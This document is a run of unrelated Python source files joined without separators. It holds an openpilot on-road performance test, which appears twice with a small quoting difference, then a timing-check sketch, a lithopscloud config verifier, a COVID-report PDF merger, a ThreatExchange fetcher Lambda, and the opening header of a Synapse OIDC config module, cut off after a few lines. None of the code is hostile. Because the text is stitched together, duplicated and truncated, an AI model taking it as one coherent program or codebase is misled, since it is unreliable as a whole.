#!/usr/bin/env python3 import json import os import subprocess import time import numpy as np import unittest from collections import Counter from pathlib import Path from cereal import car import cereal.messaging as messaging from cereal.services import service_list from common.basedir import BASEDIR from common.timeout import Timeout from common.params import Params from selfdrive.controls.lib.events import EVENTS, ET from selfdrive.loggerd.config import ROOT from selfdrive.test.helpers import set_params_enabled, release_only from tools.lib.logreader import LogReader # Baseline CPU usage by process PROCS = { "selfdrive.controls.controlsd": 35.0, "./loggerd": 10.0, "./encoderd": 12.5, "./camerad": 16.5, "./locationd": 9.1, "selfdrive.controls.plannerd": 11.7, "./_ui": 26.4, "selfdrive.locationd.paramsd": 9.0, "./_sensord": 6.17, "selfdrive.controls.radard": 4.5, "./_modeld": 4.48, "./boardd": 3.63, "./_dmonitoringmodeld": 10.0, "selfdrive.thermald.thermald": 3.87, "selfdrive.locationd.calibrationd": 2.0, "./_soundd": 1.0, "selfdrive.monitoring.dmonitoringd": 1.90, "./proclogd": 1.54, "system.logmessaged": 0.2, "./clocksd": 0.02, "./ubloxd": 0.02, "selfdrive.tombstoned": 0, "./logcatd": 0, } TIMINGS = { # rtols: max/min, rsd "can": [2.5, 0.35], "pandaStates": [2.5, 0.35], "peripheralState": [2.5, 0.35], "sendcan": [2.5, 0.35], "carState": [2.5, 0.35], "carControl": [2.5, 0.35], "controlsState": [2.5, 0.35], "lateralPlan": [2.5, 0.5], "longitudinalPlan": [2.5, 0.5], "roadCameraState": [2.5, 0.35], "driverCameraState": [2.5, 0.35], "modelV2": [2.5, 0.35], "driverState": [2.5, 0.40], "liveLocationKalman": [2.5, 0.35], "wideRoadCameraState": [1.5, 0.35], } def cputime_total(ct): return ct.cpuUser + ct.cpuSystem + ct.cpuChildrenUser + ct.cpuChildrenSystem def check_cpu_usage(first_proc, last_proc): result = "\n" result += "------------------------------------------------\n" result += "------------------ CPU Usage -------------------\n" result += "------------------------------------------------\n" r = True dt = (last_proc.logMonoTime - first_proc.logMonoTime) / 1e9 for proc_name, normal_cpu_usage in PROCS.items(): err = "" first, last = None, None try: first = [p for p in first_proc.procLog.procs if proc_name in p.cmdline][0] last = [p for p in last_proc.procLog.procs if proc_name in p.cmdline][0] cpu_time = cputime_total(last) - cputime_total(first) cpu_usage = cpu_time / dt * 100. 
if cpu_usage > max(normal_cpu_usage * 1.15, normal_cpu_usage + 5.0): # cpu usage is high while playing sounds if not (proc_name == "./_soundd" and cpu_usage < 65.): err = "using more CPU than normal" elif cpu_usage < min(normal_cpu_usage * 0.65, max(normal_cpu_usage - 1.0, 0.0)): err = "using less CPU than normal" except IndexError: err = f"NO METRICS FOUND {first=} {last=}\n" result += f"{proc_name.ljust(35)} {cpu_usage:5.2f}% ({normal_cpu_usage:5.2f}%) {err}\n" if len(err) > 0: r = False result += "------------------------------------------------\n" print(result) return r class TestOnroad(unittest.TestCase): @classmethod def setUpClass(cls): if "DEBUG" in os.environ: segs = filter(lambda x: os.path.exists(os.path.join(x, "rlog")), Path(ROOT).iterdir()) segs = sorted(segs, key=lambda x: x.stat().st_mtime) cls.lr = list(LogReader(os.path.join(segs[-1], "rlog"))) return # setup env os.environ['REPLAY'] = "1" os.environ['SKIP_FW_QUERY'] = "1" os.environ['FINGERPRINT'] = "TOYOTA COROLLA TSS2 2019" params = Params() params.clear_all() set_params_enabled() # Make sure athena isn't running os.system("pkill -9 -f athena") # start manager and run openpilot for a minute proc = None try: manager_path = os.path.join(BASEDIR, "selfdrive/manager/manager.py") proc = subprocess.Popen(["python", manager_path]) sm = messaging.SubMaster(['carState']) with Timeout(150, "controls didn't start"): while sm.rcv_frame['carState'] < 0: sm.update(1000) # make sure we get at least two full segments route = None cls.segments = [] with Timeout(300, "timed out waiting for logs"): while route is None: route = params.get("CurrentRoute", encoding="utf-8") time.sleep(0.1) while len(cls.segments) < 3: segs = set() if Path(ROOT).exists(): segs = set(Path(ROOT).glob(f"{route}--*")) cls.segments = sorted(segs, key=lambda s: int(str(s).rsplit('--')[-1])) time.sleep(2) # chop off last, incomplete segment cls.segments = cls.segments[:-1] finally: if proc is not None: proc.terminate() if proc.wait(60) is None: proc.kill() cls.lrs = [list(LogReader(os.path.join(str(s), "rlog"))) for s in cls.segments] # use the second segment by default as it's the first full segment cls.lr = list(LogReader(os.path.join(str(cls.segments[1]), "rlog"))) def test_cloudlog_size(self): msgs = [m for m in self.lr if m.which() == 'logMessage'] total_size = sum(len(m.as_builder().to_bytes()) for m in msgs) self.assertLess(total_size, 3.5e5) cnt = Counter(json.loads(m.logMessage)['filename'] for m in msgs) big_logs = [f for f, n in cnt.most_common(3) if n / sum(cnt.values()) > 30.] 
self.assertEqual(len(big_logs), 0, f"Log spam: {big_logs}") def test_cpu_usage(self): proclogs = [m for m in self.lr if m.which() == 'procLog'] self.assertGreater(len(proclogs), service_list['procLog'].frequency * 45, "insufficient samples") cpu_ok = check_cpu_usage(proclogs[0], proclogs[-1]) self.assertTrue(cpu_ok) def test_camera_processing_time(self): result = "\n" result += "------------------------------------------------\n" result += "-------------- Debayer Timing ------------------\n" result += "------------------------------------------------\n" ts = [getattr(getattr(m, m.which()), "processingTime") for m in self.lr if 'CameraState' in m.which()] self.assertLess(min(ts), 0.025, f"high execution time: {min(ts)}") result += f"execution time: min {min(ts):.5f}s\n" result += f"execution time: max {max(ts):.5f}s\n" result += f"execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_mpc_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- MPC Timing ------------------\n" result += "------------------------------------------------\n" cfgs = [("lateralPlan", 0.05, 0.05), ("longitudinalPlan", 0.05, 0.05)] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "solverExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_model_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- Model Timing -----------------\n" result += "------------------------------------------------\n" # TODO: this went up when plannerd cpu usage increased, why? 
cfgs = [ ("modelV2", 0.050, 0.036), ("driverState", 0.050, 0.026), ] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "modelExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_timings(self): passed = True result = "\n" result += "------------------------------------------------\n" result += "----------------- Service Timings --------------\n" result += "------------------------------------------------\n" for s, (maxmin, rsd) in TIMINGS.items(): msgs = [m.logMonoTime for m in self.lr if m.which() == s] if not len(msgs): raise Exception(f"missing {s}") ts = np.diff(msgs) / 1e9 dt = 1 / service_list[s].frequency try: np.testing.assert_allclose(np.mean(ts), dt, rtol=0.03, err_msg=f"{s} - failed mean timing check") np.testing.assert_allclose([np.max(ts), np.min(ts)], dt, rtol=maxmin, err_msg=f"{s} - failed max/min timing check") except Exception as e: result += str(e) + "\n" passed = False if np.std(ts) / dt > rsd: result += f"{s} - failed RSD timing check\n" passed = False result += f"{s.ljust(40)}: {np.array([np.mean(ts), np.max(ts), np.min(ts)])*1e3}\n" result += f"{"".ljust(40)} {np.max(np.absolute([np.max(ts)/dt, np.min(ts)/dt]))} {np.std(ts)/dt}\n" result += "="*67 print(result) self.assertTrue(passed) @release_only def test_startup(self): startup_alert = None for msg in self.lrs[0]: # can't use carEvents because the first msg can be dropped while loggerd is starting up if msg.which() == "controlsState": startup_alert = msg.controlsState.alertText1 break expected = EVENTS[car.CarEvent.EventName.startup][ET.PERMANENT].alert_text_1 self.assertEqual(startup_alert, expected, "wrong startup alert") if __name__ == "__main__": unittest.main()
#!/usr/bin/env python3 import json import os import subprocess import time import numpy as np import unittest from collections import Counter from pathlib import Path from cereal import car import cereal.messaging as messaging from cereal.services import service_list from common.basedir import BASEDIR from common.timeout import Timeout from common.params import Params from selfdrive.controls.lib.events import EVENTS, ET from selfdrive.loggerd.config import ROOT from selfdrive.test.helpers import set_params_enabled, release_only from tools.lib.logreader import LogReader # Baseline CPU usage by process PROCS = { "selfdrive.controls.controlsd": 35.0, "./loggerd": 10.0, "./encoderd": 12.5, "./camerad": 16.5, "./locationd": 9.1, "selfdrive.controls.plannerd": 11.7, "./_ui": 26.4, "selfdrive.locationd.paramsd": 9.0, "./_sensord": 6.17, "selfdrive.controls.radard": 4.5, "./_modeld": 4.48, "./boardd": 3.63, "./_dmonitoringmodeld": 10.0, "selfdrive.thermald.thermald": 3.87, "selfdrive.locationd.calibrationd": 2.0, "./_soundd": 1.0, "selfdrive.monitoring.dmonitoringd": 1.90, "./proclogd": 1.54, "system.logmessaged": 0.2, "./clocksd": 0.02, "./ubloxd": 0.02, "selfdrive.tombstoned": 0, "./logcatd": 0, } TIMINGS = { # rtols: max/min, rsd "can": [2.5, 0.35], "pandaStates": [2.5, 0.35], "peripheralState": [2.5, 0.35], "sendcan": [2.5, 0.35], "carState": [2.5, 0.35], "carControl": [2.5, 0.35], "controlsState": [2.5, 0.35], "lateralPlan": [2.5, 0.5], "longitudinalPlan": [2.5, 0.5], "roadCameraState": [2.5, 0.35], "driverCameraState": [2.5, 0.35], "modelV2": [2.5, 0.35], "driverState": [2.5, 0.40], "liveLocationKalman": [2.5, 0.35], "wideRoadCameraState": [1.5, 0.35], } def cputime_total(ct): return ct.cpuUser + ct.cpuSystem + ct.cpuChildrenUser + ct.cpuChildrenSystem def check_cpu_usage(first_proc, last_proc): result = "\n" result += "------------------------------------------------\n" result += "------------------ CPU Usage -------------------\n" result += "------------------------------------------------\n" r = True dt = (last_proc.logMonoTime - first_proc.logMonoTime) / 1e9 for proc_name, normal_cpu_usage in PROCS.items(): err = "" first, last = None, None try: first = [p for p in first_proc.procLog.procs if proc_name in p.cmdline][0] last = [p for p in last_proc.procLog.procs if proc_name in p.cmdline][0] cpu_time = cputime_total(last) - cputime_total(first) cpu_usage = cpu_time / dt * 100. 
if cpu_usage > max(normal_cpu_usage * 1.15, normal_cpu_usage + 5.0): # cpu usage is high while playing sounds if not (proc_name == "./_soundd" and cpu_usage < 65.): err = "using more CPU than normal" elif cpu_usage < min(normal_cpu_usage * 0.65, max(normal_cpu_usage - 1.0, 0.0)): err = "using less CPU than normal" except IndexError: err = f"NO METRICS FOUND {first=} {last=}\n" result += f"{proc_name.ljust(35)} {cpu_usage:5.2f}% ({normal_cpu_usage:5.2f}%) {err}\n" if len(err) > 0: r = False result += "------------------------------------------------\n" print(result) return r class TestOnroad(unittest.TestCase): @classmethod def setUpClass(cls): if "DEBUG" in os.environ: segs = filter(lambda x: os.path.exists(os.path.join(x, "rlog")), Path(ROOT).iterdir()) segs = sorted(segs, key=lambda x: x.stat().st_mtime) cls.lr = list(LogReader(os.path.join(segs[-1], "rlog"))) return # setup env os.environ['REPLAY'] = "1" os.environ['SKIP_FW_QUERY'] = "1" os.environ['FINGERPRINT'] = "TOYOTA COROLLA TSS2 2019" params = Params() params.clear_all() set_params_enabled() # Make sure athena isn't running os.system("pkill -9 -f athena") # start manager and run openpilot for a minute proc = None try: manager_path = os.path.join(BASEDIR, "selfdrive/manager/manager.py") proc = subprocess.Popen(["python", manager_path]) sm = messaging.SubMaster(['carState']) with Timeout(150, "controls didn't start"): while sm.rcv_frame['carState'] < 0: sm.update(1000) # make sure we get at least two full segments route = None cls.segments = [] with Timeout(300, "timed out waiting for logs"): while route is None: route = params.get("CurrentRoute", encoding="utf-8") time.sleep(0.1) while len(cls.segments) < 3: segs = set() if Path(ROOT).exists(): segs = set(Path(ROOT).glob(f"{route}--*")) cls.segments = sorted(segs, key=lambda s: int(str(s).rsplit('--')[-1])) time.sleep(2) # chop off last, incomplete segment cls.segments = cls.segments[:-1] finally: if proc is not None: proc.terminate() if proc.wait(60) is None: proc.kill() cls.lrs = [list(LogReader(os.path.join(str(s), "rlog"))) for s in cls.segments] # use the second segment by default as it's the first full segment cls.lr = list(LogReader(os.path.join(str(cls.segments[1]), "rlog"))) def test_cloudlog_size(self): msgs = [m for m in self.lr if m.which() == 'logMessage'] total_size = sum(len(m.as_builder().to_bytes()) for m in msgs) self.assertLess(total_size, 3.5e5) cnt = Counter(json.loads(m.logMessage)['filename'] for m in msgs) big_logs = [f for f, n in cnt.most_common(3) if n / sum(cnt.values()) > 30.] 
self.assertEqual(len(big_logs), 0, f"Log spam: {big_logs}") def test_cpu_usage(self): proclogs = [m for m in self.lr if m.which() == 'procLog'] self.assertGreater(len(proclogs), service_list['procLog'].frequency * 45, "insufficient samples") cpu_ok = check_cpu_usage(proclogs[0], proclogs[-1]) self.assertTrue(cpu_ok) def test_camera_processing_time(self): result = "\n" result += "------------------------------------------------\n" result += "-------------- Debayer Timing ------------------\n" result += "------------------------------------------------\n" ts = [getattr(getattr(m, m.which()), "processingTime") for m in self.lr if 'CameraState' in m.which()] self.assertLess(min(ts), 0.025, f"high execution time: {min(ts)}") result += f"execution time: min {min(ts):.5f}s\n" result += f"execution time: max {max(ts):.5f}s\n" result += f"execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_mpc_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- MPC Timing ------------------\n" result += "------------------------------------------------\n" cfgs = [("lateralPlan", 0.05, 0.05), ("longitudinalPlan", 0.05, 0.05)] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "solverExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_model_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- Model Timing -----------------\n" result += "------------------------------------------------\n" # TODO: this went up when plannerd cpu usage increased, why? 
cfgs = [ ("modelV2", 0.050, 0.036), ("driverState", 0.050, 0.026), ] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "modelExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_timings(self): passed = True result = "\n" result += "------------------------------------------------\n" result += "----------------- Service Timings --------------\n" result += "------------------------------------------------\n" for s, (maxmin, rsd) in TIMINGS.items(): msgs = [m.logMonoTime for m in self.lr if m.which() == s] if not len(msgs): raise Exception(f"missing {s}") ts = np.diff(msgs) / 1e9 dt = 1 / service_list[s].frequency try: np.testing.assert_allclose(np.mean(ts), dt, rtol=0.03, err_msg=f"{s} - failed mean timing check") np.testing.assert_allclose([np.max(ts), np.min(ts)], dt, rtol=maxmin, err_msg=f"{s} - failed max/min timing check") except Exception as e: result += str(e) + "\n" passed = False if np.std(ts) / dt > rsd: result += f"{s} - failed RSD timing check\n" passed = False result += f"{s.ljust(40)}: {np.array([np.mean(ts), np.max(ts), np.min(ts)])*1e3}\n" result += f"{''.ljust(40)} {np.max(np.absolute([np.max(ts)/dt, np.min(ts)/dt]))} {np.std(ts)/dt}\n" result += "="*67 print(result) self.assertTrue(passed) @release_only def test_startup(self): startup_alert = None for msg in self.lrs[0]: # can't use carEvents because the first msg can be dropped while loggerd is starting up if msg.which() == "controlsState": startup_alert = msg.controlsState.alertText1 break expected = EVENTS[car.CarEvent.EventName.startup][ET.PERMANENT].alert_text_1 self.assertEqual(startup_alert, expected, "wrong startup alert") if __name__ == "__main__": unittest.main()
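# A minimal, self-contained sketch of the per-service timing check performed by
# TestOnroad.test_timings above: the mean interval must sit within 3% of the
# nominal period, the max/min intervals within the per-service "maxmin" rtol,
# and the relative standard deviation below "rsd". The service frequency,
# tolerances and synthetic timestamps below are illustrative only.
import numpy as np


def check_service_timing(mono_times_ns, frequency_hz, maxmin_rtol, rsd_limit):
  """Return (ok, reasons) for one service's stream of logMonoTime values."""
  ts = np.diff(mono_times_ns) / 1e9            # intervals in seconds
  dt = 1.0 / frequency_hz                      # nominal period
  reasons = []
  if abs(np.mean(ts) - dt) > 0.03 * dt:
    reasons.append("failed mean timing check")
  if abs(np.max(ts) - dt) > maxmin_rtol * dt or abs(np.min(ts) - dt) > maxmin_rtol * dt:
    reasons.append("failed max/min timing check")
  if np.std(ts) / dt > rsd_limit:
    reasons.append("failed RSD timing check")
  return len(reasons) == 0, reasons


if __name__ == "__main__":
  # a hypothetical 20 Hz service with a little jitter
  rng = np.random.default_rng(0)
  mono_times_ns = np.cumsum(rng.normal(0.05, 0.002, 1000)) * 1e9
  print(check_service_timing(mono_times_ns, 20.0, maxmin_rtol=2.5, rsd_limit=0.35))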
import importlib import os import yaml from inquirer import errors from lithopscloud.modules.api_key import verify_iam_api_key from lithopscloud.modules.utils import color_msg, Color, ARG_STATUS, MSG_STATUS, free_dialog, inquire_user # TODO: change ibm_cos path to cos after cos-package name changes to cos CONFIGURABLE_STORAGE = [{'config_title': 'ibm_cos', 'path': 'cos-package'}, {'config_title': 'localhost', 'path': 'local_host'}] CONFIGURABLE_COMPUTE = [{'config_title': 'ibm_cf', 'path': 'cloud_functions'}, {'config_title': 'code_engine', 'path': 'code_engine'}, {'config_title': 'localhost', 'path': 'local_host'}] def verify_config_file(config_file, output_file): """executed via cli flag 'verify-config', this function outputs error messages based on lacking or invalid values of the provided lithops config file. """ verify_file_path(config_file) with open(config_file) as f: base_config = yaml.safe_load(f) verify_iamapikey(base_config) # verify once a commonly shared resource in various backends chosen_compute, chosen_storage = get_backends(base_config) output_config = {'lithops': base_config['lithops']} storage_path = next((x['path'] for x in CONFIGURABLE_STORAGE if x['config_title'] == chosen_storage)) compute_path = next((x['path'] for x in CONFIGURABLE_COMPUTE if x['config_title'] == chosen_compute)) for path in [storage_path, compute_path]: verify_module = importlib.import_module(f"lithopscloud.modules.{path}.verify") verify_func = verify_module.__getattribute__('verify') res = verify_func(base_config) if res: output_config.update(res) else: print(color_msg(f"{MSG_STATUS.ERROR.value} Couldn't produce a valid lithops config file from input", Color.RED)) exit(1) with open(output_file, 'w') as outfile: yaml.dump(output_config, outfile, default_flow_style=False) print("\n\n=================================================") print(color_msg(f"Extracted config file: {output_file}", color=Color.LIGHTGREEN)) print("=================================================") def get_backends(base_config): if base_config.get('lithops'): if base_config['lithops'].get('backend'): chosen_compute = base_config['lithops'].get('backend') if chosen_compute not in [compute['config_title'] for compute in CONFIGURABLE_COMPUTE]: print(color_msg(f"{MSG_STATUS.ERROR.value} chosen compute backend isn't configurable at this point in time." f"\nAvailable compute backends: {[backend['config_title'] for backend in CONFIGURABLE_COMPUTE]}",Color.RED)) exit(1) else: print(color_msg("Missing chosen compute backend under lithops->backend",Color.RED)) chosen_compute = get_missing_backend(base_config, CONFIGURABLE_COMPUTE) if base_config['lithops'].get('storage'): chosen_storage = base_config['lithops'].get('storage') if chosen_storage not in [storage['config_title'] for storage in CONFIGURABLE_STORAGE]: print(color_msg(f"{MSG_STATUS.ERROR.value} chosen storage backend isn't configurable at this point in time." 
f"\nAvailable storage backends: {[backend['config_title'] for backend in CONFIGURABLE_STORAGE]}",Color.RED)) exit(1) else: print(color_msg("Missing chosen storage backend under lithops->storage", Color.RED)) chosen_storage = get_missing_backend(base_config, CONFIGURABLE_STORAGE) else: base_config['lithops'] = {'backend': '', 'storage': ''} chosen_compute = get_missing_backend(base_config, CONFIGURABLE_COMPUTE) chosen_storage = get_missing_backend(base_config, CONFIGURABLE_STORAGE) return chosen_compute, chosen_storage def get_missing_backend(config_data, backend_list): """returns the missing compute/storage backend title, the user would like to verify in the verification process.""" input_file_backends = {backend['config_title'] for backend in backend_list}.intersection(config_data.keys()) backend_type = 'computation' if backend_list == CONFIGURABLE_COMPUTE else 'storage' backend_header = 'backend' if backend_list == CONFIGURABLE_COMPUTE else 'storage' if len(input_file_backends) > 1: chosen_backend = inquire_user("please choose a single computation backend", input_file_backends, handle_strings=True) config_data['lithops'].update({f'{backend_header}': chosen_backend}) elif len(input_file_backends) == 1: chosen_backend = next((x for x in input_file_backends)) # set: {} doesn't support '[]' get item operation config_data['lithops'].update({f'{backend_header}': chosen_backend}) else: print(color_msg(f"[Error] No supported {backend_type} backends were found in the config file", Color.RED)) exit(1) return chosen_backend def verify_iamapikey(base_config): if 'ibm' in base_config and base_config['ibm'] and 'iam_api_key' in base_config['ibm']: try: verify_iam_api_key('', base_config['ibm']['iam_api_key']) except errors.ValidationError: base_config['ibm']['iam_api_key'] = ARG_STATUS.INVALID print(color_msg('No IAmApiKey matching the given value was found', Color.RED)) else: base_config['ibm'] = {'iam_api_key': ''} def verify_file_path(config_file): def _is_valid_input_path(path): if not os.path.isfile(path): print(color_msg(f"\nError - Path: '{path}' doesn't point to a file. ", color=Color.RED)) return False return True while True: if _is_valid_input_path(config_file): return config_file else: config_file = free_dialog('Provide a path to an existing config file')['answer']
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Mar 17 12:33:39 2021 @author: Clement """ import pandas import PyPDF2 import os import sys import docx from docxtpl import DocxTemplate from docx2pdf import convert sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from gen_fct import df_fct from gen_fct import file_fct class merging_pdf: def __init__ (self, list_files): self.db_files, self.db_file_date = df_fct.read_db_files() self.root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) self.date = pandas.to_datetime('today') self.list_files = list_files def full_path (self, a_file): if self.db_files.loc[a_file, 'add_date']: year = self.db_file_date.loc[a_file, 'date'].strftime("%Y") month = self.db_file_date.loc[a_file, 'date'].strftime("%m - %B") day = self.db_file_date.loc[a_file, 'date'].strftime("%Y-%m-%d") source_path = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path']}/{year}/{month}") source_path_prev = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path_prev']}/{year}/{month}") name_file = self.db_files.loc[a_file, 'pref'] + day + self.db_files.loc[a_file, 'suf'] else: source_path = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path']}") source_path_prev = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path_prev']}") name_file = self.db_files.loc[a_file, 'pref'] + self.db_files.loc[a_file, 'suf'] full_name = os.path.normpath(f'{source_path}/{name_file}.pdf') return full_name def merging_pdf (self, full_path): pdf_writer = PyPDF2.PdfFileWriter() file = open(full_path, 'rb') file_reader = PyPDF2.PdfFileReader(file) for page_num in range(file_reader.numPages): page_object = file_reader.getPage(page_num) pdf_writer.addPage(page_object) #os.remove(full_path) for a_file in self.list_files: if self.db_files.loc[a_file, 'type_file'] == 'Graph': full_name = self.full_path (a_file) file = open(full_name, 'rb') file_reader = PyPDF2.PdfFileReader(file) for page_num in range(file_reader.numPages): page_object = file_reader.getPage(page_num) pdf_writer.addPage(page_object) file_fct.save_pdf (pdf_writer, self.date) file.close() os.remove(full_path) def var_template (self): final_dic = {} final_dic['date'] = self.date.strftime("%Y-%m-%d") full_list = [] page = 2 for a_file in self.list_files: if self.db_files.loc[a_file, 'type_file'] == 'Graph': full_list.append({'name': a_file, 'page': page}) full_name = self.full_path (a_file) file = open(full_name, 'rb') file_reader = PyPDF2.PdfFileReader(file) page += file_reader.numPages final_dic['list_file'] = full_list return final_dic def fill_template (self): context = self.var_template() path_to_template = os.path.normpath(f'{self.root}/src/pdf_creation/template.docx') template = DocxTemplate(path_to_template) template.render (context) date_str = self.date.strftime("%Y-%m-%d") year = self.date.strftime("%Y") month = self.date.strftime("%m - %B") #file_dir = f"{self.root}/reports/Daily_PDF/{year}/{month}" #file_name = f"First_page_{date_str}" file_dir = f"{self.root}/reports/Daily_PDF" file_name = "First_page" file_fct.creation_folder ('', [file_dir]) full_path = os.path.normcase(f'{file_dir}/{file_name}.docx') template.save(full_path) convert(full_path) os.remove(full_path) return os.path.normcase(f'{file_dir}/{file_name}.pdf') def main (self): print('*** Generating daily brief ***\n\n') full_path = self.fill_template() self.merging_pdf(full_path) if __name__ == '__main__': list_files = 
["4_countries_delta", "4_countries_growth", "world_delta", "world_growth", "stack_plot", "France_delta", "France_growth", "France_Gen_Situation", "France_Indic_Nat", "Map_France_Indic", "Map_France_Prev_tx_incid", "Map_France_Prev_R", "Map_France_Prev_taux_occupation_sae", "Map_France_Prev_tx_pos", "French_Vax", "US_Testing", "France_Testing", "All countries"] list_files = ["4_countries_delta", "4_countries_growth", "world_delta", "world_growth", "stack_plot", "France_delta", "France_growth", "Portugal_delta", "Portugal_growth", "France_Gen_Situation", "France_Indic_Nat", "Map_France_Indic", "Map_France_Prev_tx_incid", "Map_France_Prev_R", "Map_France_Prev_taux_occupation_sae", "Map_France_Prev_tx_pos", "French_Vax", "France_Testing", "All countries"] merging_pdf(list_files).main()
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved """ Implementation of the "fetcher" module of HMA. Fetching involves connecting to the ThreatExchange API and downloading signals to synchronize a local copy of the database, which will then be fed into various indices. """ import logging import os import typing as t from dataclasses import dataclass from datetime import datetime from functools import lru_cache import boto3 from threatexchange.api import ThreatExchangeAPI from threatexchange.signal_type.pdq import PdqSignal from threatexchange.signal_type.md5 import VideoMD5Signal from hmalib.aws_secrets import AWSSecrets from hmalib.common.config import HMAConfig from hmalib.common.logging import get_logger from hmalib.common.configs.fetcher import ThreatExchangeConfig from hmalib.common.s3_adapters import ThreatUpdateS3Store logger = get_logger(__name__) dynamodb = boto3.resource("dynamodb") @lru_cache(maxsize=None) def get_s3_client(): return boto3.client("s3") # Lambda init tricks @lru_cache(maxsize=1) def lambda_init_once(): """ Do some late initialization for required lambda components. Lambda initialization is weird - despite the existence of perfectly good constructions like __name__ == __main__, there don't appear to be easy ways to split your lambda-specific logic from your module logic except by splitting up the files and making your lambda entry as small as possible. TODO: Just refactor this file to separate the lambda and functional components """ cfg = FetcherConfig.get() HMAConfig.initialize(cfg.config_table_name) @dataclass class FetcherConfig: """ Simple holder for getting typed environment variables """ s3_bucket: str s3_te_data_folder: str config_table_name: str data_store_table: str @classmethod @lru_cache(maxsize=None) # probably overkill, but at least it's consistent def get(cls): # These defaults are naive but can be updated for testing purposes. return cls( s3_bucket=os.environ["THREAT_EXCHANGE_DATA_BUCKET_NAME"], s3_te_data_folder=os.environ["THREAT_EXCHANGE_DATA_FOLDER"], config_table_name=os.environ["CONFIG_TABLE_NAME"], data_store_table=os.environ["DYNAMODB_DATASTORE_TABLE"], ) def is_int(int_string: str): """ Checks if string is convertible to int. """ try: int(int_string) return True except ValueError: return False def lambda_handler(event, context): lambda_init_once() config = FetcherConfig.get() collabs = ThreatExchangeConfig.get_all() now = datetime.now() current_time = now.strftime("%H:%M:%S") names = [collab.privacy_group_name for collab in collabs[:5]] if len(names) < len(collabs): names[-1] = "..." data = f"Triggered at time {current_time}, found {len(collabs)} collabs: {', '.join(names)}" logger.info(data) api_key = AWSSecrets().te_api_key() api = ThreatExchangeAPI(api_key) for collab in collabs: logger.info( "Processing updates for collaboration %s", collab.privacy_group_name ) if not is_int(collab.privacy_group_id): logger.info( f"Fetch skipped because privacy_group_id({collab.privacy_group_id}) is not an int" ) continue indicator_store = ThreatUpdateS3Store( int(collab.privacy_group_id), api.app_id, s3_client=get_s3_client(), s3_bucket_name=config.s3_bucket, s3_te_data_folder=config.s3_te_data_folder, data_store_table=config.data_store_table, supported_signal_types=[VideoMD5Signal, PdqSignal], ) indicator_store.load_checkpoint() if indicator_store.stale: logger.warning( "Store for %s - %d stale! 
Resetting.", collab.privacy_group_name, int(collab.privacy_group_id), ) indicator_store.reset() if indicator_store.fetch_checkpoint >= now.timestamp(): continue delta = indicator_store.next_delta try: delta.incremental_sync_from_threatexchange( api, ) except: # Don't need to call .exception() here because we're just re-raising logger.error("Exception occurred! Attempting to save...") # Force delta to show finished delta.end = delta.current raise finally: if delta: logging.info("Fetch complete, applying %d updates", len(delta.updates)) indicator_store.apply_updates( delta, post_apply_fn=indicator_store.post_apply ) else: logging.error("Failed before fetching any records")
# Copyright 2020 Quentin Gliech # Copyright 2020-2021 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import Counter from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type import attr from synapse.config._util import validate_config from synapse.config.sso import SsoAttributeRequirement from synapse.python_dependencies import DependencyException, check_requirements from synapse.types import JsonDict from synapse.util.module_loader import load_module from synapse.util.stringutils import parse_and_validate_mxc_uri from ._base import Config, ConfigError, read_file DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider" # 